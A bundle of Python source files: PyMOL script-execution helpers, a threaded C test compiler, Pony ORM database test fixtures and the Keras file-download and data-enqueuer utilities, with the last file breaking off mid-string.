co = compile(pi.file_read(filename), filename, 'exec')
exec(co, global_ns, local_ns)
def run_file(file,global_ns,local_ns):
global_ns['__script__'] = file
try:
execfile(file,global_ns,local_ns)
except pymol.CmdException:
# so the idea here is to print the traceback here and then
# cascade all the way back up to the interactive level
# without any further output
_print_exc()
raise QuietException
def run_file_as_module(file,spawn=0):
name = re.sub('[^A-Za-z0-9]','_',file)
if not isinstance(name, str):
# Python 2 only
name = name.encode('ascii', errors='ignore')
mod = types.ModuleType(name)
mod.__file__ = file
mod.__script__ = file
sys.modules[name]=mod
if spawn:
t = threading.Thread(target=execfile,
args=(file,mod.__dict__,mod.__dict__))
t.setDaemon(1)
t.start()
else:
try:
execfile(file,mod.__dict__,mod.__dict__)
except pymol.CmdException:
_print_exc()
raise QuietException
del sys.modules[name]
del mod
def spawn_file(args,global_ns,local_ns):
local_ns['__script__'] = args
t = threading.Thread(target=execfile,args=(args,global_ns,local_ns))
t.setDaemon(1)
t.start()
def split(*arg,**kw): # custom split-and-trim
'''
split(string,token[,count]) -> list of strings
UTILITY FUNCTION, NOT PART OF THE API
Breaks strings up by tokens but preserves quoted strings and
parenthetical groups (such as atom selections).
USAGE OF THIS FUNCTION IS DISCOURAGED - THE GOAL IS TO
MAKE IT UNNECESSARY BY IMPROVING THE BUILT-IN PARSER
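Illustrative behavior (a sketch added for clarity, not from the original docs):
    split("a,(b,c),d", ",")  ->  ['a', '(b,c)', 'd']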
'''
str = arg[0]
tok = arg[1]
if len(arg)>2:
mx=arg[2]
else:
mx=0
pair = { '(':')','[':']','{':'}',"'":"'",'"':'"' }
plst = list(pair.keys())
stack = []
lst = []
c = 0
nf = 0
l = len(str)
wd = ""
while str[c]==tok:
c = c + 1
while c<l:
ch = str[c]
if (ch in tok) and (len(stack)==0):
lst.append(wd.strip())
nf = nf + 1
if mx:
if nf==mx:
wd = str[c+1:].strip()
break
wd = ''
w = 0
else:
if len(stack):
if ch==stack[0]:
stack = stack[1:]
elif (ch in plst):
stack[:0]=[pair[ch]]
elif (ch in plst):
stack[:0]=[pair[ch]]
wd = wd + ch
c = c + 1
if len(wd):
lst.append(wd.strip())
return lst
import pymol
|
test.py
|
#!/usr/bin/python3
from pathlib import Path
import subprocess
import os
import string
import sys
import threading
SOURCE_DIR: str = './tests'
BUILD_DIR: str = "./build"
C_COMPILER: str = "gcc"
def task(filename: Path):
output_name = f"{Path(filename).stem}_test"
final_output_file = f"{BUILD_DIR}/{output_name}"
subprocess.run(args=[C_COMPILER, filename, "-g", "-o",
final_output_file])
subprocess.run(args=[final_output_file])
print(f"done testing {final_output_file}")
if __name__ == '__main__':
Path(f"{BUILD_DIR}").mkdir(parents=True, exist_ok=True)
tasks = []
for dirName, subdirList, fileList in os.walk(SOURCE_DIR):
for fname in list(filter(lambda x: x.endswith(".c"), fileList)):
test_c_file = f"{dirName}/{fname}"
print(f"compiling:{test_c_file}")
thread = threading.Thread(target=task, args=(test_c_file,))
thread.start()
tasks.append(thread)
for t in tasks:
t.join()
|
fixtures.py
|
import sys
import os
import logging
from pony.py23compat import PY2
from ponytest import with_cli_args, pony_fixtures, provider_validators, provider, Fixture, \
ValidationError
from functools import wraps, partial
import click
from contextlib import contextmanager, closing
from pony.utils import cached_property, class_property
if not PY2:
from contextlib import contextmanager, ContextDecorator
else:
from contextlib2 import contextmanager, ContextDecorator
import unittest
from pony.orm import db_session, Database, rollback, delete
if not PY2:
from io import StringIO
else:
from StringIO import StringIO
from multiprocessing import Process
import threading
class DBContext(ContextDecorator):
fixture = 'db'
enabled = False
def __init__(self, Test):
if not isinstance(Test, type):
# FIXME ?
TestCls = type(Test)
NewClass = type(TestCls.__name__, (TestCls,), {})
NewClass.__module__ = TestCls.__module__
NewClass.db = property(lambda t: self.db)
Test.__class__ = NewClass
else:
Test.db = class_property(lambda cls: self.db)
self.Test = Test
@class_property
def fixture_name(cls):
return cls.db_provider
@class_property
def db_provider(cls):
# is used in tests
return cls.provider_key
def init_db(self):
raise NotImplementedError
@cached_property
def db(self):
raise NotImplementedError
def __enter__(self):
self.init_db()
try:
self.Test.make_entities()
except (AttributeError, TypeError):
# no make_entities method with the expected signature
pass
else:
self.db.generate_mapping(check_tables=True, create_tables=True)
return self.db
def __exit__(self, *exc_info):
self.db.provider.disconnect()
@classmethod
def validate_fixtures(cls, fixtures, config):
return any(f.fixture_key == 'db' for f in fixtures)
db_name = 'testdb'
@provider()
class GenerateMapping(ContextDecorator):
weight = 200
fixture = 'generate_mapping'
def __init__(self, Test):
self.Test = Test
def __enter__(self):
db = getattr(self.Test, 'db', None)
if not db or not db.entities:
return
for entity in db.entities.values():
if entity._database_.schema is None:
db.generate_mapping(check_tables=True, create_tables=True)
break
def __exit__(self, *exc_info):
pass
@provider()
class MySqlContext(DBContext):
provider_key = 'mysql'
def drop_db(self, cursor):
cursor.execute('use sys')
cursor.execute('drop database %s' % self.db_name)
def init_db(self):
from pony.orm.dbproviders.mysql import mysql_module
with closing(mysql_module.connect(**self.CONN).cursor()) as c:
try:
self.drop_db(c)
except mysql_module.DatabaseError as exc:
print('Failed to drop db: %s' % exc)
c.execute('create database %s' % self.db_name)
c.execute('use %s' % self.db_name)
CONN = {
'host': "localhost",
'user': "ponytest",
'passwd': "ponytest",
}
@cached_property
def db(self):
CONN = dict(self.CONN, db=self.db_name)
return Database('mysql', **CONN)
@provider()
class SqlServerContext(DBContext):
provider_key = 'sqlserver'
def get_conn_string(self, db=None):
s = (
'DSN=MSSQLdb;'
'SERVER=mssql;'
'UID=sa;'
'PWD=pass;'
)
if db:
s += 'DATABASE=%s' % db
return s
@cached_property
def db(self):
CONN = self.get_conn_string(self.db_name)
return Database('mssqlserver', CONN)
def init_db(self):
import pyodbc
cursor = pyodbc.connect(self.get_conn_string(), autocommit=True).cursor()
with closing(cursor) as c:
try:
self.drop_db(c)
except pyodbc.DatabaseError as exc:
print('Failed to drop db: %s' % exc)
c.execute('CREATE DATABASE %s' % self.db_name)  # SQL Server does not accept MySQL character-set clauses
c.execute('use %s' % self.db_name)
def drop_db(self, cursor):
cursor.execute('use master')
cursor.execute('drop database %s' % self.db_name)
class SqliteMixin(DBContext):
def init_db(self):
try:
os.remove(self.db_path)
except OSError as exc:
print('Failed to drop db: %s' % exc)
@cached_property
def db_path(self):
p = os.path.dirname(__file__)
p = os.path.join(p, '%s.sqlite' % self.db_name)
return os.path.abspath(p)
@cached_property
def db(self):
return Database('sqlite', self.db_path, create_db=True)
@provider()
class SqliteNoJson1(SqliteMixin):
provider_key = 'sqlite_no_json1'
enabled = True
def __init__(self, cls):
self.Test = cls
cls.no_json1 = True
return super(SqliteNoJson1, self).__init__(cls)
def __enter__(self):
resource = super(SqliteNoJson1, self).__enter__()
self.json1_available = self.Test.db.provider.json1_available
self.Test.db.provider.json1_available = False
return resource
def __exit__(self, *exc_info):
self.Test.db.provider.json1_available = self.json1_available
return super(SqliteNoJson1, self).__exit__(*exc_info)
@provider()
class SqliteJson1(SqliteMixin):
provider_key = 'sqlite_json1'
def __enter__(self):
result = super(SqliteJson1, self).__enter__()
if not self.db.provider.json1_available:
raise unittest.SkipTest
return result
@provider()
class PostgresContext(DBContext):
provider_key = 'postgresql'
def get_conn_dict(self, no_db=False):
d = dict(
user='ponytest', password='ponytest',
host='localhost', database='postgres',
)
if not no_db:
d.update(database=self.db_name)
return d
def init_db(self):
import psycopg2
conn = psycopg2.connect(
**self.get_conn_dict(no_db=True)
)
conn.set_isolation_level(0)
with closing(conn.cursor()) as cursor:
try:
self.drop_db(cursor)
except psycopg2.DatabaseError as exc:
print('Failed to drop db: %s' % exc)
cursor.execute('create database %s' % self.db_name)
def drop_db(self, cursor):
cursor.execute('drop database %s' % self.db_name)
@cached_property
def db(self):
return Database('postgres', **self.get_conn_dict())
@provider()
class OracleContext(DBContext):
provider_key = 'oracle'
def __enter__(self):
os.environ.update(dict(
ORACLE_BASE='/u01/app/oracle',
ORACLE_HOME='/u01/app/oracle/product/12.1.0/dbhome_1',
ORACLE_OWNR='oracle',
ORACLE_SID='orcl',
))
return super(OracleContext, self).__enter__()
def init_db(self):
import cx_Oracle
with closing(self.connect_sys()) as conn:
with closing(conn.cursor()) as cursor:
try:
self._destroy_test_user(cursor)
except cx_Oracle.DatabaseError as exc:
print('Failed to drop user: %s' % exc)
try:
self._drop_tablespace(cursor)
except cx_Oracle.DatabaseError as exc:
print('Failed to drop db: %s' % exc)
cursor.execute(
"""CREATE TABLESPACE %(tblspace)s
DATAFILE '%(datafile)s' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE %(maxsize)s
""" % self.parameters)
cursor.execute(
"""CREATE TEMPORARY TABLESPACE %(tblspace_temp)s
TEMPFILE '%(datafile_tmp)s' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE %(maxsize_tmp)s
""" % self.parameters)
self._create_test_user(cursor)
def _drop_tablespace(self, cursor):
cursor.execute(
'DROP TABLESPACE %(tblspace)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS'
% self.parameters)
cursor.execute(
'DROP TABLESPACE %(tblspace_temp)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS'
% self.parameters)
parameters = {
'tblspace': 'test_tblspace',
'tblspace_temp': 'test_tblspace_temp',
'datafile': 'test_datafile.dbf',
'datafile_tmp': 'test_datafile_tmp.dbf',
'user': 'ponytest',
'password': 'ponytest',
'maxsize': '100M',
'maxsize_tmp': '100M',
}
def connect_sys(self):
import cx_Oracle
return cx_Oracle.connect('sys/the@localhost/ORCL', mode=cx_Oracle.SYSDBA)
def connect_test(self):
import cx_Oracle
return cx_Oracle.connect('ponytest/ponytest@localhost/ORCL')
@cached_property
def db(self):
return Database('oracle', 'ponytest/ponytest@localhost/ORCL')
def _create_test_user(self, cursor):
cursor.execute(
"""CREATE USER %(user)s
IDENTIFIED BY %(password)s
DEFAULT TABLESPACE %(tblspace)s
TEMPORARY TABLESPACE %(tblspace_temp)s
QUOTA UNLIMITED ON %(tblspace)s
""" % self.parameters
)
cursor.execute(
"""GRANT CREATE SESSION,
CREATE TABLE,
CREATE SEQUENCE,
CREATE PROCEDURE,
CREATE TRIGGER
TO %(user)s
""" % self.parameters
)
def _destroy_test_user(self, cursor):
cursor.execute('''
DROP USER %(user)s CASCADE
''' % self.parameters)
@provider(fixture='log', weight=100, enabled=False)
@contextmanager
def logging_context(test):
level = logging.getLogger().level
from pony.orm.core import debug, sql_debug
logging.getLogger().setLevel(logging.INFO)
sql_debug(True)
yield
logging.getLogger().setLevel(level)
sql_debug(debug)
@provider(fixture='log_all', weight=-100, enabled=False)
def log_all(Test):
return logging_context(Test)
# @with_cli_args
# @click.option('--log', 'scope', flag_value='test')
# @click.option('--log-all', 'scope', flag_value='all')
# def use_logging(scope):
# if scope == 'test':
# yield logging_context
# elif scope =='all':
# yield log_all
# @provider(enabled=False)
# class DBSessionProvider(object):
#
# fixture= 'db_session'
#
# weight = 30
#
# def __new__(cls, test):
# return db_session
@provider(fixture='rollback', weight=40)
@contextmanager
def do_rollback(test):
try:
yield
finally:
rollback()
@provider()
class SeparateProcess(object):
# TODO read failures from sep process better
fixture = 'separate_process'
enabled = False
def __init__(self, Test):
self.Test = Test
def __call__(self, func):
def wrapper(Test):
rnr = unittest.runner.TextTestRunner()
TestCls = Test if isinstance(Test, type) else type(Test)
def runTest(self):
try:
func(Test)
finally:
rnr.stream = unittest.runner._WritelnDecorator(StringIO())
name = getattr(func, '__name__', 'runTest')
Case = type(TestCls.__name__, (TestCls,), {name: runTest})
Case.__module__ = TestCls.__module__
case = Case(name)
suite = unittest.suite.TestSuite([case])
def run():
result = rnr.run(suite)
if not result.wasSuccessful():
sys.exit(1)
p = Process(target=run, args=())
p.start()
p.join()
case.assertEqual(p.exitcode, 0)
return wrapper
@classmethod
def validate_chain(cls, fixtures, klass):
for f in fixtures:
if f.KEY in ('ipdb', 'ipdb_all'):
return False
for f in fixtures:
if f.KEY == 'db' and f.provider_key in ('sqlserver', 'oracle'):
return True
@provider()
class ClearTables(ContextDecorator):
fixture = 'clear_tables'
def __init__(self, test):
self.test = test
def __enter__(self):
pass
@db_session
def __exit__(self, *exc_info):
db = self.test.db
for entity in db.entities.values():
if entity._database_.schema is None:
break
delete(i for i in entity)
import signal
@provider()
class Timeout(object):
fixture = 'timeout'
@with_cli_args
@click.option('--timeout', type=int)
def __init__(self, Test, timeout):
self.Test = Test
self.timeout = timeout if timeout else Test.TIMEOUT
enabled = False
class Exception(Exception):
pass
class FailedInSubprocess(Exception):
pass
def __call__(self, func):
def wrapper(test):
p = Process(target=func, args=(test,))
p.start()
def on_expired():
p.terminate()
t = threading.Timer(self.timeout, on_expired)
t.start()
p.join()
t.cancel()
if p.exitcode == -signal.SIGTERM:
raise self.Exception
elif p.exitcode:
raise self.FailedInSubprocess
return wrapper
@classmethod
@with_cli_args
@click.option('--timeout', type=int)
def validate_chain(cls, fixtures, klass, timeout):
if not getattr(klass, 'TIMEOUT', None) and not timeout:
return False
for f in fixtures:
if f.KEY in ('ipdb', 'ipdb_all'):
return False
for f in fixtures:
if f.KEY == 'db' and f.provider_key in ('sqlserver', 'oracle'):
return True
pony_fixtures['test'].extend([
'log',
'clear_tables',
])
pony_fixtures['class'].extend([
'separate_process',
'timeout',
'db',
'log_all',
'generate_mapping',
])
|
data_utils.py
|
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import multiprocessing as mp
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import warnings
import zipfile
from abc import abstractmethod
from contextlib import closing
from multiprocessing.pool import ThreadPool
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
try:
import queue
except ImportError:
import Queue as queue
from ..utils.generic_utils import Progbar
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrive` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
# Arguments
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
with closing(urlopen(url, data)) as response, open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
# Arguments
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
# Returns
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError,
KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
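# Example
```python
# illustrative only: the URL below is a placeholder, not a real resource
path = get_file('example.tar.gz',
                origin='https://example.com/data/example.tar.gz',
                extract=True)
```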
# Arguments
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored).
# Returns
Path to the downloaded file
""" # noqa
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' +
file_hash + ' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {} : {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except (Exception, KeyboardInterrupt):
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
# Example
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
# Arguments
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
The file hash
"""
if algorithm in ('sha256', 'auto'):  # no expected hash is available here, so treat 'auto' as sha256
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
# Arguments
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
Whether the file is valid
"""
if ((algorithm == 'sha256') or
(algorithm == 'auto' and len(file_hash) == 64)):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`. The method `__getitem__` should return a complete batch.
# Notes
`Sequence` is a safer way to do multiprocessing. This structure guarantees
that the network will only train once on each sample per epoch, which is not
the case with generators.
# Examples
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return int(np.ceil(len(self.x) / float(self.batch_size)))
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
use_sequence_api = True
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
# Arguments
index: position of the batch in the Sequence.
# Returns
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
# Returns
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
# Arguments
uid: int, Sequence identifier
i: index
# Returns
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
# Examples
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.close()
```
The `enqueuer.get()` should be an infinite stream of data.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = mp.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Send current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
sequence: A `keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
return lambda seqs: mp.Pool(workers,
initializer=init_pool,
initargs=(seqs,))
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except Exception:
self.stop()
six.reraise(*sys.exc_info())
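# Hedged usage sketch (illustrative, not part of the original module): drive an
# `OrderedEnqueuer` over a toy Sequence with worker threads. `ToySequence` is a
# hypothetical name; any `Sequence` subclass defined as above would work.
if __name__ == "__main__":
    class ToySequence(Sequence):
        def __len__(self):
            return 3

        def __getitem__(self, idx):
            return idx, idx * 10

    toy = ToySequence()
    enqueuer = OrderedEnqueuer(toy, use_multiprocessing=False)
    enqueuer.start(workers=2, max_queue_size=4)
    batches = enqueuer.get()
    for _ in range(len(toy)):
        print(next(batches))  # (0, 0), (1, 10), (2, 20), in order
    enqueuer.stop()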
def init_pool_generator(gens, random_seed=None):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
if random_seed is not None:
ident = mp.current_process().ident
np.random.seed(random_seed + ident)
def next_sample(uid):
"""Get the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
# Arguments
uid: int, generator identifier
# Returns
The next value of generator `uid`.
"""
return six.next(_SHARED_SEQUENCES[uid])
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers; each worker process offsets it
by its process identifier so workers draw different random streams.
"""
def __init__(self, sequence, use_multiprocessing=False, wait_time=None,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(sequence, use_multiprocessing)
self.random_seed = random_seed
if wait_time is not None:
warnings.warn('`wait_time` is not used anymore.',
DeprecationWarning)
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
return lambda seqs: mp.Pool(workers,
initializer=init_pool_generator,
initargs=(seqs, self.random_seed))
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
list(map(lambda f: f.wait(), last_ones))
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e:
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
"Your generator is NOT thread-safe."
"Keras requires a thread-safe generator when"
